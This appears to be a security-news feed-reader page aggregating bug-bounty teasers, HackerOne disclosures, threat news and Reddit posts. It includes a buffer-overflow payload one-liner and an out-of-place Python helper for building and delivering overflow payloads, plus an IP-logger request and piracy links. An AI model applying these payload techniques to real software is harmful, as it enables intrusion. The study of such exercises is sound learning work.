    Today I'm going to talk about an XSS that I found on a public bug bounty program about a year ago; this program has multiple websites and… Continue reading on Medium »
    The mistakes of a novice
    Who is Soheil vanaee? Continue reading on Medium »
    How I found 5 CVEs in few days
    Hi all, Continue reading on Medium »
    Response Manipulation in the Admin panel leads to PII leakage
    Hi there, 7odamo is here. Today I will talk about how I was able to view all the customer reports on the UPS Admin Panel Continue reading on System Weakness »
    Response Manipulation in the Admin panel leads to PII leakage
    Hi there, 7odamo is here. Today I will talk about how I was able to view all the customer reports on the UPS Admin Panel Continue reading on Medium »
  • Open

    Finding client-side prototype pollution with DOM Invader
    Last year we made it significantly easier to find DOM XSS, when we introduced a brand new tool called DOM Invader. This year, we've improved DOM Invader to make finding CSPP (client-side prototype pol
  • Open

    FreeBuf Morning Report | US authorities say the RSOCKS botnet has been dismantled; decentralized finance hit hard by cybercrime
    US authorities, working with law-enforcement agencies in Germany, the Netherlands and the UK, successfully dismantled infrastructure linked to the Russian RSOCKS botnet.
    Google releases a "SOC Building Guide", offering new thinking on the future SOC
    Google discusses the direction of future automated SOC construction in terms of the significance of SOC transformation, the definition of automated security operations, and concrete methods for achieving automated security operations.
    US Department of Justice successfully takes down the RSocks botnet
    The botnet compromised and hijacked millions of computers, smartphones and IoT devices worldwide, without the victims' knowledge, for use as proxy servers.
    Users of Siemens industrial control systems take note: 15 security vulnerabilities exposed
    Siemens SINEC Network Management System (NMS) contains 15 security vulnerabilities that an attacker could chain to achieve remote code execution on affected systems.
    DeadBolt ransomware strikes again; QNAP is investigating
    QNAP recently detected a new DeadBolt ransomware campaign; according to current victim reports, the campaign appears to target NAS devices running QTS 4.x.

  • Open

    Account Takeover by OTP bypass
    Hey everyone! This bypass is a little bit interesting and you will hopefully get to learn a lot. Continue reading on Medium »
    SQLI-Real-Victim
    Hello guys, in this tutorial I have a real victim in my article, and I do not really want to censor it because they act like idiots… Continue reading on Medium »
    How I found my first Bug using my android phone
    Hello there!! Continue reading on Medium »
    Bug Bounty Tips
    Okay, here I will share some tips from experience that may be quite useful for bug hunters; first I will explain what Postman is. Continue reading on Medium »
    How a broken link got me over €250
    Hey! This is Prath. I'm here to tell you about an old finding I made, in which I found a broken link. Continue reading on Medium »
  • Open

    On-demand / online introductory courses / certifications in IT-Forensics ~ $500 USD?
    Hello, Just to be clear, I've read the FAQ here about "Which forensics certifications should I get?". I am (surprise surprise) an EU citizen, so I'm looking for an on-demand / online training course which is a prep for a certificate in IT forensics encompassing the basics, preferably without being geared towards a specific vendor (EnCase etc.). I am paying this out of pocket, so IACIS and SANS / GIAC certificates are too expensive; I was thinking about around $500 USD or so for both: * An online / on-demand course which would cover the exam * Including an exam voucher. The ONLY alternative I've found is the EC-Council Digital Forensics Essentials, which for $199 covers an on-demand course and gives one attempt at the certification; EC-Council Computer Forensics Investigation Training | EC-Council iClass (eccouncil.org). Now, what I've read about CEH and CHFI isn't exactly stellar, and people's experience with EC-Council as a whole doesn't seem to be either (go figure). Does anyone have any other suggestions? I've already taken Network+ and Security+ and am thinking about taking the A+ just to have the CompTIA trifecta; other than that I have various Azure and AWS certificates. Other than A+, I was thinking about delving into Python, which seems both interesting and also worthwhile in the DFIR / IT forensics field. Linux+ from CompTIA is also on the roadmap. Thank you for your time and suggestions! submitted by /u/TheSwede86 [link] [comments]
    SANS FOR508 on Linux
    Hi all, I'm soon attending FOR508 and have an unanswered question. The prerequisites for the course state virtualization software on Windows/macOS; does anyone know any reason why it shouldn't be OK to run it on top of Linux? submitted by /u/redditsecguy [link] [comments]
    Any websites to track IPs or view them when people click on the link?
    I'm looking for kind of a troll website that people can click on and have their IP address visit registered whenever they do it, so I can see them. The reason is that I'm being harassed by my ex-boyfriend and his girlfriend and I have no way to prove it, and I know a website that gives me the address with the IP but not the IP itself. Or, if I could pay one of you guys to make that website for me, if it is possible, how much would that cost? And show me, of course, a few of your previous works. I'd kindly appreciate it if you educate me a little bit on this topic. Thank you, Best regards. submitted by /u/Proper-Ad-1944 [link] [comments]
  • Open

    SecWiki News 2022-06-19 Review
    Collection of materials on static analysis and code audit automation by ourren; Pwn mind map by ourren; Analysis of how CodeQL databases are created by ourren; My front-end learning path by ourren; How a paper destroyed Bitcoin's anonymity by ourren; A first look at security gateway (network isolation) products by ourren; My knowledge management approach by ourren. For more of the latest articles, visit SecWiki
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    Lists, inventories, series and other dangerous objects
    A week ago, after some second thoughts, I decided to address, on the Intelli|sfèra YouTube channel, the question of the… Continue reading on Medium »
    SPY NEWS: 2022 — Week 24
    Summary of the espionage-related news stories for the Week 24 (12–18 June) of 2022. Continue reading on Medium »
  • Open

    Authentication token and CSRF token bypass
    Enjin disclosed a bug submitted by whiteshadow201: https://hackerone.com/reports/998457 - Bounty: $300
    bypass forced password protection via circles app
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1406926 - Bounty: $100
  • Open

    New blog - NMAP and CME 101 stuff
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    NSFW Pics few folders, few pics each.
    small OD, Big Tits. https://bustygrls.com/pics/images/ BlakeLively Canucks Halloween KimKardashian LindsayLohan Masturbation NickiMinaj Rihanna RitaOra ScarlettJohansson Winter babes blowjobs booty celebs cleavage emo milf pro pussy titties tittyfuck voluptuous xmas JPG's Total wall clock time: 1m 13s Downloaded: 696 files, 36M in 5.6s (6.45 MB/s) submitted by /u/thats_dumberst [link] [comments]
  • Open

    FreeBuf Morning Report | Former Amazon engineer stole data of 100 million people; 80% of Internet TVs collect user data illegally
    Former Amazon software engineer Paige Thompson was charged with stealing data from Capital One in 2019 and faces up to 20 years in prison for wire fraud.
  • Open

    Is there an easy way to tell which Cisco devices can have the Smart Install service?
    I'm teaching a class, and thought about buying a Cisco device to demonstrate how to exploit the Smart Install service to get the hashes and crack them. But of course I'd buy old used ones on eBay. But I have no idea which devices SI can run on. Thanks submitted by /u/networkalchemy [link] [comments]

  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. This is a web challenge. The challenge was created on 13th February 2021. It is a… Continue reading on Medium »
    Lesser Known Web Attacks: Server Side Injection
    Introduction Continue reading on Medium »
    OAuth Misconfiguration Leads To Pre-Account Takeover
    Hello, Continue reading on Medium »
    How I hacked one of the biggest Airlines in the world
    Hello Bug Bounty community, this is my first write-up, about a bug with which I managed to take over all accounts in one well-known Airline in… Continue reading on Medium »
    My First Bug- Account Takeover
    Hi Amazing People, Hope you are all doing well. This is my very first article on my first ever bug that I found. So in case if you find… Continue reading on Medium »
    AlbusSec:- Penetration-List 011 API Vulnerabilities — Sample
    Hi Information Security folk, I hope you liked my previous article that was on Cross-Origin-Resource-Sharing(CORS) Misconfiguration… Continue reading on Medium »
    How I found a No Rate Limit bug
    Hello everyone, Continue reading on Medium »
  • Open

    I made a website that can detect over 1000 extensions and shows you the percentage of users that share the same extensions.
    submitted by /u/z0ccc_z0ccc [link] [comments]
    Dangerous Repository of DoS, Red Teaming TTPs, and ICS Exploits
    submitted by /u/entropydaemon6 [link] [comments]
    Scheduled Scaling Up & Down Of EC2 Server
    submitted by /u/ajaidanial [link] [comments]
    I have created a Burp Suite extension which allows pentesters to keep track of each API and write test cases for individual APIs. Lastly, the extension allows mapping the vulnerable APIs to a list of vulnerabilities using a custom checklist.
    submitted by /u/Ano_F [link] [comments]
  • Open

    Clair – Vulnerability Static Analysis for Containers
    Article URL: https://github.com/quay/clair Comments URL: https://news.ycombinator.com/item?id=31793991 Points: 8 # Comments: 0
  • Open

    OSINTGRAM — Extract data from an Instagram profile
    OSINTGRAM is a tool written in python3 that makes it practical to extract various kinds of data from a public Instagram profile… Continue reading on 100security »
    Life of a Minion
    If we look cautiously enough our social media has already been flooded with sock puppets, swaying our thoughts about a particular topic in… Continue reading on Medium »
    Instaloader — Instagram On Your Terminal
    Have you ever wanted to stop using Instagram, but couldn't because you will be missing your “friends” posts and stories. Use INSTALOADER. Continue reading on Medium »
  • Open

    I clicked on a phishing link on my Android phone and was redirected to 404 not found. Is my information at risk?
    So I got this link in a text message, saying there had been an attempt to log into my Amazon account from another country, and I needed to verify my account. I became rather scared and clicked on the link, but it led to a 404 not found page. Then I realized it was a scam and closed the site. I ran an antivirus scan and found nothing. From what I read on the internet, my understanding is that unless I give my personal info or install another app following the phishing link, I should be okay, because my device can't be harmed just by clicking on a link, as Android apps are sandboxed and one app can't get info from another app. However, what I don't understand is, why would scammers put up a 404 not found page if they want any information? Does it not defeat the purpose? How can anyone enter info in a dead page? Apparently Microsoft already warned about this type of 404 not found phishing links. Is it the case that it is a custom 404 page that's not supposed to look dead? My page looked very dead. I'm rather confused. submitted by /u/Lame_Buddha [link] [comments]
  • Open

    Broken access control
    UPS VDP disclosed a bug submitted by nayefhamouda: https://hackerone.com/reports/1539426
  • Open

    SecWiki News 2022-06-18 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    X (2022) — Movie Review
    X (2022) is a slasher horror thriller from Ti West and is set in the late 1970s Texas where an adult film crew decides to take up the… Continue reading on Medium »
  • Open

    Interpretation and impact analysis of BIS's "Information Security Controls: Cybersecurity Items"
    This article mainly interprets the "Information Securi …" rule published by the U.S. Department of Commerce's Bureau of Industry and Security (BIS) on May 26, 2022 … Continue reading Interpretation and impact analysis of BIS's "Information Security Controls: Cybersecurity Items" →
  • Open

    Handling null bytes for buffer overflows
    Hello, I am reading the book Hacking: The Art of Exploitation and trying to perform a buffer overflow. The command that is used: reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10') But on my machine I have a null byte (\x00\x00\x07\xe1), therefore it does not handle this well and omits my null bytes. I tried using piping, even trying to play with the source code of the shell, but it does not work... do you have any ideas how I can overcome this issue? When doing printf "\xe1\x07\x00\x00" | hd I am managing to pipe the null byte (without command substitution I am managing to pipe the null bytes; thinking somehow to use this way). Edited: It also works when writing into a file; I do see the null bytes when doing: hd < args But the stdin is not redirected :( When doing ./myExe < args it still sees < as an argument (so doing certain manipulations with gdb that I saw on the internet, i.e. https://stackoverflow.com/questions/2953658/gdb-trouble-with-stdin-redirection?fbclid=IwAR16ic5ia0811JN18Dp0Aex7juTkT_KuX_g9A0huhwzZsdE4__myUJm5sUI) submitted by /u/MrsSergeivna [link] [comments]
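    The constraint the post above runs into can be checked before touching the target. The following is an added example written for this page (not code from the book, the poster, or the auth_overflow2 program): argv entries are NUL-terminated C strings, so an address containing 0x00 can never be passed whole through `$(...)` or any other argument, and a strcpy()-based overflow only ever receives bytes up to and including the first NUL. The helper names (`build_payload`, `delivery_plan`, and so on) are this example's own; the two addresses are the book's 0x080484bf and the poster's 0x000007e1.

```python
"""Added example (not from the book or the post): why a return address that
contains 0x00 cannot be delivered through argv or $(...) command substitution,
and what a strcpy()-based overflow such as auth_overflow2 actually receives."""
import struct


def build_payload(ret_addr: int, repeat: int, word_size: int = 4) -> bytes:
    """Little-endian pack of ret_addr repeated `repeat` times: the same bytes
    the book's perl -e 'print "..."x10' one-liner prints (4-byte x86 by
    default, 8-byte x86-64 with word_size=8)."""
    fmt = "<I" if word_size == 4 else "<Q"
    return struct.pack(fmt, ret_addr) * repeat


def argv_safe(payload: bytes) -> bool:
    """execve() hands each argv[] entry to the new process as a NUL-terminated
    C string, so an embedded 0x00 ends the argument early. bash's $(...) also
    drops them ("warning: command substitution: ignored null byte in input")."""
    return b"\x00" not in payload


def as_seen_by_strcpy(payload: bytes) -> bytes:
    """strcpy() copies up to and including the first NUL; nothing after it
    reaches the destination buffer."""
    i = payload.find(b"\x00")
    return payload if i < 0 else payload[: i + 1]


def trailing_nuls_only(payload: bytes) -> bool:
    """True when every NUL in the payload sits at its very end."""
    body = payload.rstrip(b"\x00")
    return len(body) < len(payload) and b"\x00" not in body


def delivery_plan(payload: bytes) -> str:
    """Decide how the bytes can reach the vulnerable buffer."""
    if argv_safe(payload):
        return "argv"  # the book's $(perl -e ...) trick works as-is
    if trailing_nuls_only(payload):
        # strcpy() writes the first trailing NUL for free as its terminator;
        # any further NULs must already be in memory (for example the high
        # bytes of a saved return address into a non-PIE 64-bit binary).
        return "argv-partial-overwrite"
    # An interior NUL is unreachable via argv or the environment: write the
    # raw bytes to a file and redirect it to stdin, which only helps if the
    # program reads its input from stdin rather than from argv.
    return "stdin-or-file"


def write_payload(path: str, payload: bytes) -> int:
    """Write the raw bytes (NULs intact) for `./target < path`; returns size."""
    with open(path, "wb") as f:
        return f.write(payload)


if __name__ == "__main__":
    book = build_payload(0x080484BF, 10)   # address used in the book
    mine = build_payload(0x000007E1, 10)   # the poster's address, repeated x10
    print(book.hex(), delivery_plan(book))
    print(mine.hex(), delivery_plan(mine),
          "strcpy keeps only", as_seen_by_strcpy(mine).hex())
```

    Running it shows the book's payload going through argv untouched, while the repeated 0x000007e1 payload is cut to `e1 07 00` by strcpy() and flagged for stdin delivery; repeating an address that contains NULs cannot work through an argument no matter how the shell is coaxed, so the overflow either has to tolerate a single trailing NUL or the program has to read the bytes from stdin.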
  • Open

    Giving Red Team Ops certs to women and LGBTQIA+ for Pride Month!
    submitted by /u/VVX7 [link] [comments]

  • Open

    CSRF leads to account takeover in Yahoo!
    submitted by /u/vinay737 [link] [comments]
    Analyzing the latest version of Matanbuchus
    submitted by /u/OwnPreparation3424 [link] [comments]
    Securing OT Network Management Systems: Siemens SINEC NMS
    submitted by /u/derp6996 [link] [comments]
    AWS Lambda Command Injection
    submitted by /u/lormayna [link] [comments]
    BRATA is evolving into an APT | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
  • Open

    [Security Advisory] Remote code exec... in multiple Cisco Small Business routers
    Cisco recently published a security advisory fixing multiple vulnerabilities in several of its small business routers. Vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W and RV215W routers allow...
  • Open

    The 2022 attack-and-defense exercise practice guide circulating in the enterprise defender groups: we finally got it!
    Guide in hand, high score assured!
    CVE-2021-31760 Webmin cross-site request forgery vulnerability
    A textbook case of CSRF where a single click gets the victim's host checked in to the attacker's C2.
    Intranet penetration | Forward proxies and configuring nginx as a reverse proxy explained
    I never quite understood how nginx implements reverse proxying, so here is a summary.
    Analysis of the demonic vulnerability in the MetaMask browser extension wallet
    If you need help detecting the demonic vulnerability, contact the SlowMist security team.
    Unpatched Microsoft Exchange servers are under attack by BlackCat ransomware
    Microsoft has issued a warning that the BlackCat ransomware is exploiting vulnerabilities in unpatched Exchange servers to gain access to target networks.
    SAST, an essential software security technique, in one article
    Static application security testing, also known as static analysis, finds security vulnerabilities by looking directly at an application's source code, so they can be fixed before they cost the business.
    FreeBuf Weekly | Ukraine moves critical data to neighboring NATO countries; the US holds the 2022 Cyber Shield exercise
    The United States held its 2022 "Cyber Shield" exercise.
    Researchers discover new IceXLoader 3.0 version written in Nim
    Researchers recently found that the latest IceXLoader version 3.0 is written in Nim, a language attackers have been experimenting with in attacks over the past two years.
    Attacks using the new loader BumbleBee increase; used by ransomware gangs
    Researchers have observed BumbleBee becoming active recently, with a significant increase in the number of servers, and have found multiple updated and improved versions.
    How to keep the browser from becoming the attacker's "entry point" in attack-and-defense exercises | FreeBuf enterprise-group discussion
    What browser-related security requirements are people most concerned about? Is there a way to balance browser security, usability and compatibility?
    The “暗象” (literally "Dark Elephant") group: a decade-long hidden cyberattack campaign
    The “暗象” group's primary attack method is sending highly deceptive spear-phishing emails from Gmail/Yahoo mailboxes or stolen mailboxes.
    iCloud hacker sentenced to 9 years in prison for stealing nude photos
    A man admitted to breaking into thousands of Apple iCloud accounts and stealing large numbers of victims' nude photos and videos.
    Bypassing and exploiting storage bucket upload policies and signed URLs
    This article contains some of my own humble views; readers with questions or other ideas are welcome to discuss in the comments.
    Threat actors abuse a Microsoft Office 365 feature to launch ransom attacks against enterprises
    Threat actors could hijack Office 365 accounts and encrypt files stored in SharePoint and OneDrive to extort a ransom.
  • Open

    Hacking a NFT Marketplace
    Background: Continue reading on Medium »
    CRLF injection scanner
    The most powerful CRLF injection (HTTP Response Splitting) scanner. CRLFsuite — CRLF injection scanner Continue reading on Medium »
    Fuzzing With Custom Wordlists
    Hello Hackers Continue reading on Medium »
  • Open

    Automating Cobalt Strike with Python
    TL;DR I have expanded the payload_automation Python libraries to allow for synchronously controlling actions in a Cobalt Strike Beacon by adding the Beacon class. This enables you to script out Cobalt Strike actions purely in Python and avoid coding anything in Sleep completely (at least for things I’ve already implemented).  One important fact to take note of is that the actions happen synchronously. Those who have worked in Sleep/Aggressor know that it’s a fire and forget language in most cases, so waiting until an action is completed or adding logic based on the results of an action is notoriously difficult to accomplish. With this library, we can synchronize the actions and in most cases, easily capture the output of a specific action in Python and perform actions based on that output…
  • Open

    sql injection via https://setup.p2p.ihost.com/
    IBM disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1567516
    CSRF Bypassed on Logout Endpoint
    Enjin disclosed a bug submitted by er_salil: https://hackerone.com/reports/1091403
    Race condition via project team member invitation system.
    Enjin disclosed a bug submitted by akashhamal0x01: https://hackerone.com/reports/1108291 - Bounty: $60
  • Open

    War in Ukraine / June 16
    Ukraine can get the status of a candidate for EU membership in a week Continue reading on Medium »
    From office clerk to citizen journalist: this is the story of Bellingcat
    While most people use social media mainly for entertainment and keeping in touch, Eliot Higgins uses it for something quite… Continue reading on Journalistiek Ede Kijk-luister-leeslijst »
    OhSINT — TryHackMe WriteUp
    Open Source Intelligence (OSINT) is a sub-type of threat intelligence that is only gathered from free, public sources. Continue reading on Medium »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-06-17 Review
    VED (Vault Exploit Defense): open source implementation by ourren; My story with SRC by ourren; The “暗象” group: a decade-long hidden cyberattack campaign by ourren. For more of the latest articles, visit SecWiki
  • Open

    Reddit patches CSRF vulnerability that forced users to view NSFW content
    Article URL: https://portswigger.net/daily-swig/reddit-patches-csrf-vulnerability-that-forced-users-to-view-nsfw-content Comments URL: https://news.ycombinator.com/item?id=31779704 Points: 3 # Comments: 0
  • Open

    How to forensics copy Google Drive?
    Hello everyone! Excluding UFED and Magnet Axiom, is there any other software that provides a forensic acquisition of a Google Account/Google Drive? submitted by /u/Zipper_Ita [link] [comments]
    Dept just added a computer liaison program to our ranks. They are to assist with the Computer Crime Task Force. What trainings, certifications or programs can be recommended in taking outside of vendor specific training?
    Looking for some guidance to get certifications and trainings that my department may not be aware of. Outside of vendor specific and NW3C they really haven’t pushed much. Thank you in advance. submitted by /u/Embarrassed_Sky_1193 [link] [comments]
  • Open

    ISO 27001 Awareness Training & Quiz
    Hello! Do you know any worthy of attention ISO 27001 awareness training & quiz? It should be for all internal employees. It should be something not boring, and not difficult. submitted by /u/athanielx [link] [comments]
    Incorporating YARA Into Security Processes?
    Hey guys, I just recently learned about YARA and how it can help identify malware. I want to incorporate it into our current security processes, but to be honest, I'm sorta confused as to what we can truly do with it. YARA Rules sound very similar to just signature based AV. What real advantage does YARA provide and any tips on incorporating it into our daily routines? It seems to be valuable, but after multiple TI courses and YT videos, I'm still lacking the understanding of why it's valuable and how I can use it to better our security posture. submitted by /u/haroldhanson [link] [comments]
  • Open

    CobaltStrike traffic analysis and intrusion detection
    Author: ainrm @ 薮猫科技 security services team. WeChat public account: 薮猫科技 (follow us) https://mp.weixin.qq.com/s/CjsqWrm70HVEnolZrRD8oA 1. Foreword: Cobalt Strike is a team-collaboration intranet penetration tool that plays an important role in attack-and-defense exercises and testing. It is powerful and widely used, and every major security vendor has put it on the list of tools to "look after". The common detection approaches are memory-based and traffic-based; this article starts from the traffic side and, through packet capture...
  • Open

    Dev-ops and lots of e-courses
    https://www.kgay4all.com/seioqueseiporleroqueleio/ submitted by /u/inoculatemedia [link] [comments]
    Bunch of dealer mode TV content
    Big files https://cdn.loewe.tv/movies/ submitted by /u/inoculatemedia [link] [comments]

  • Open

    OSINT Blog #1
    I’m going to use this page for a few reasons. Firstly, OSINT Dojo has several rankings, for which need you to have a go at an OSINT CTF… Continue reading on Medium »
    War in Ukraine / June 15
    War in Ukraine / June 15 Continue reading on Medium »
    OSINT: How Dangerous Is It?
    What exactly is OSINT?  Open Source Intelligence (OSINT) are collections of data that can be gathered for free from public sources and… Continue reading on Medium »
    Jihadist Snapshot: Daesh & AQ Trends — Monthly Analysis #3
    The Moonshot MEA (Middle East and Africa) Snapshot Series focuses on Moonshot’s online harms and violent extremism work across the Middle… Continue reading on Medium »
    Solving HariBahadur CTF
    URL to join the CTF: https://tryhackme.com/jr/haribahadur and can submit flags. The CTF is actually situated on… Continue reading on Medium »
  • Open

    That Pipe Is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/that-pipe-is-still-leaking-revisiting-the-rdp-named-pipe-vulnerability Comments URL: https://news.ycombinator.com/item?id=31771796 Points: 2 # Comments: 0
  • Open

    Consolidate split .e01 image files into single file?
    While creating an image of a 128GB disk, I accidentally set it to split the image into 2GB files. For some situations dealing with 18 files is not ideal. I'm wondering, is there a way to consolidate the split files into one file? Preferably without mounting the split image and creating a new one? submitted by /u/thenebular [link] [comments]
    Using write blocker to image a drive that is still in computer.
    Anyone have experience using write-blocker to connect and image in the following setup? laptop ——writeblocker—— laptop Any help would be nice thanks ! submitted by /u/mr_merica20 [link] [comments]
    Was given a .dist for NICE Inform, need to convert it to useable audio
    Hello, I've been tasked to combine 911 calls into a playable .mp4. The discovery package includes a .distribution that will only open with NICE Inform. I'm the most tech-savvy of the bunch, but this is really above my pay grade. If anyone has been able to free the audio files from this software before I'd appreciate any advice. Thank you. submitted by /u/Dcap16 [link] [comments]
  • Open

    Database attack and defense: MySQL
    MySQL is the most popular relational database and the one red teams encounter most often in attack-and-defense engagements.
    From concepts to security practice: a basic guide to the software supply chain
    Research shows attackers are actively targeting open source components as a way into the software supply chain. Cyberattacks against open source tooling rose 650% in the past 12 months.
    FreeBuf Morning Report | US Army applies cloud computing in combat; Ukraine moves critical national data to neighboring countries
    The US Army is integrating cloud computing into the development and testing of its command post computing environment to provide continuous mission command at the tactical edge.
    Interpol seizes $50 million; more than 2,000 "social engineers" arrested
    An international law enforcement operation codenamed "First Light 2022" seized $50 million in illicit proceeds worldwide and arrested thousands of people involved in social engineering fraud.
    "New Forces in Cybersecurity" founders' alliance season kicks off June 22 at 10:00!
    Meet seven cybersecurity founders and explore emerging technology trends in the industry.
    Building a low-latency, high-concurrency enterprise protection architecture | CIS summer edition talk preview
    How should the WAF evolve in the digital age to keep pace with the threat landscape? CIS security experts will tell you!
    Email giant Zimbra hit by severe vulnerability; attackers can log in without a password
    By exploiting the vulnerability, attackers can steal login credentials without authentication or user interaction.
    Cisco email security flaw lets attackers log in to its web management interface
    The vulnerability could allow an attacker to bypass authentication and log in to the web management interface of Cisco email gateway appliances.
    Attackers exploit three-year-old Telerik vulnerability to deploy Cobalt Strike
    An attacker tracked as Blue Mockingbird exploits a Telerik UI vulnerability to compromise servers and install Cobalt Strike beacons.
  • Open

    That Pipe is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    submitted by /u/jat0369 [link] [comments]
    Analysing RTF files from SideWinder APT
    submitted by /u/OwnPreparation3424 [link] [comments]
    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    submitted by /u/Gallus [link] [comments]
    The Android kernel mitigations obstacle race
    submitted by /u/0xdea [link] [comments]
    Quick Malware Analysis Using Free Tools: Malware infection from Brazil malspam pcap from 2022-04-19
    submitted by /u/dougburks [link] [comments]
    VED (Vault Exploit Defense): Open source implementation
    submitted by /u/hardenedvault [link] [comments]
    Shadow Credentials - Red Teaming Experiments
    submitted by /u/Kondencuotaspienas [link] [comments]
    DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
    submitted by /u/cryptogram [link] [comments]
  • Open

    xmlrpc file enabled
    Yelp disclosed a bug submitted by happykira0x1: https://hackerone.com/reports/1575401
    curl "globbing" can lead to denial of service attacks
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1572120
    CSRF (protection bypassed) to force a below 18 user into viewing an nsfw subreddit !
    Reddit disclosed a bug submitted by marvelmaniac: https://hackerone.com/reports/1480569 - Bounty: $500
    Stored XSS on TikTok Live Form
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1542703 - Bounty: $1500
  • Open

    How I secured ISP (Internet Service Provider)
    Hello everyone hope all are safe and doing good. I am Cypher_Jerry Aka Harsha from Telangana, and a part-time bug bounty hunter. Continue reading on Medium »
    Bypass Email Confirmation
    Hello everyone. In this blog, I will share my finding on how I was able to bypass the email confirmation just by paying close attention… Continue reading on Medium »
    The Helio Bounty Program is now live
    We are pleased to announce the official start of the Helio Bounty Program for our community and security researchers. It is critical to… Continue reading on Medium »
    All one-liners for bug bounty hunters
    Check all one-liners below. Continue reading on Medium »
    $700 Bounty writeup
    Hello readers, Continue reading on Medium »
    Hacking into WordPress themes for CVEs and fun
    Hi there! I hope all is well with you. In this writeup, I'll discuss the research I did on a WordPress theme, which taught me a lot… Continue reading on Pentester Nepal »
    Aurora Stalls A Sizable DeFi Hack, Pays $6M Bug Bounty through Immunefi
    It could have been the next market-moving DeFi hack, but thanks to bug bounty! Continue reading on Medium »
    CSRF leads to account takeover in Yahoo!
    How I managed to hack the accounts of arbitrary users of a Yahoo! application in only 30 minutes. Continue reading on Medium »
    XSS Blind Stored at Asset Domain Android Apps TikTok
    Hi everyone Continue reading on Medium »
  • Open

    Caldera: Red Team Emulation (Part 1)
    This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE The post Caldera: Red Team Emulation (Part 1) appeared first on Hacking Articles.
  • Open

    Are these skills enough to get me a decent entry-level job in pentesting?
    I am studying engineering (1.5 years left to graduate) and wanna drop out badly. I am based in Egypt and wondering if these skills are enough to get me a decent entry-level job in pentesting (remote or not) once I drop out. - 2 years experience in bug bounty hunting (only like 20 valid bugs because it was alongside college (XSS, info disclosures, etc.)) - solid programming experience (been programming as a hobby for over 6 years). Honestly that's about it; I also know stuff like basic networking, Linux (main OS), OWASP Top Ten and more, but the two points I mentioned earlier are the best of what I can put on a resume. I also went for the OSCP once and failed; gonna retake it but don't wanna put it here as a certainty of course :) Let's say I take a few months after dropping out to improve my resume, start a blog, write a few technical writeups, explain sec stuff and whatnot, also maybe find a few CVEs to add to the resume. Is this enough to start applying? How will not having a degree affect my chances? submitted by /u/watermelonSoundsNice [link] [comments]
  • Open

    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    Article URL: https://www.thezdi.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack Comments URL: https://news.ycombinator.com/item?id=31768705 Points: 111 # Comments: 9
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    SecWiki News 2022-06-16 Review
    CobaltStrike traffic analysis and intrusion detection by ourren; Google's direction for the future of cloud security (CISO cloud security transformation guide white paper) by ourren; CyberBattleSim (automated intranet penetration) research and analysis by ourren; Understanding event knowledge graphs in one article by ourren; Capability model for the information security BP by ourren; Interpretation and impact analysis of BIS's "Information Security Controls: Cybersecurity Items" by ourren; Translation of "Survey of Existing SBOM Formats and Standards" by ourren. For more of the latest articles, visit SecWiki
  • Open

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]
  • Open

    Hang Fire: Challenging our Mental Model of Initial Access
    For as long as I’ve been working in security, initial access has generally looked the same. While there are high degrees of variation… Continue reading on Posts By SpecterOps Team Members »
  • Open

    How to see the impact installing BApps might have on Burp Suite
    If you've ever installed any Burp extensions from the BApp Store, you'll know that it's a great way to extend your capabilities and tailor Burp Suite to your every need. If you've not, then what are y
  • Open

    Lots of education videos & classes from few different sources
    I haven't been through all of these yet but it seems to be up-to-date stuff. http://s28.bitdl.ir/Video/ submitted by /u/Allouttagoodnames [link] [comments]
    Help me!!!!
    Can anyone help me find the link or knows where I can download season 1 of gentleman jack series? I’ve searched for too long. Please help. submitted by /u/Bubbless02 [link] [comments]
  • Open

    Analysis of how CodeQL database creation works
    Author: 六炅. This article is a contributed submission; Seebug Paper looks forward to your submissions, and every accepted article receives a gift! Submission mailbox: paper@seebug.org. Preface: CodeQL is a good code analysis and scanning tool, and for me it has been a great help in vulnerability discovery. I have been using it for some time; previously I mostly worked with open source projects, so creating and analyzing a database with CodeQL was relatively simple and not very constrained. Recently, while hunting for Java deserialization gadget chains, I came across...
  • Open

    OSINT: the art of discovering the existing
    By Luli Rosenberg Continue reading on Medium »
    War in Ukraine / June 14
    Europe wants Ukraine to prepare for negotiations Continue reading on Medium »
    404CTF — Name of a new [extreme] recruit #OSINT
    Continue reading on Medium »
  • Open

    Rate limit Bypass on contact-us through IP Rotator (burp extension)(https://www.linkedin.com/help/linkedin/solve/contact)
    LinkedIn disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1578121
    Delete direct message history without access the proper conversation_id
    Twitter disclosed a bug submitted by saiful6601: https://hackerone.com/reports/1487804 - Bounty: $560
    Remote 0click exfiltration of Safari user's IP address
    Twitter disclosed a bug submitted by max2x: https://hackerone.com/reports/1392211 - Bounty: $560
    The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more su
    LinkedIn disclosed a bug submitted by suryasnn: https://hackerone.com/reports/1591504
    Golang : Add Query To Detect PAM Authorization Bugs
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1597437 - Bounty: $1800
    Golang : Hardcoded secret used for signing JWT
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1595009 - Bounty: $1800
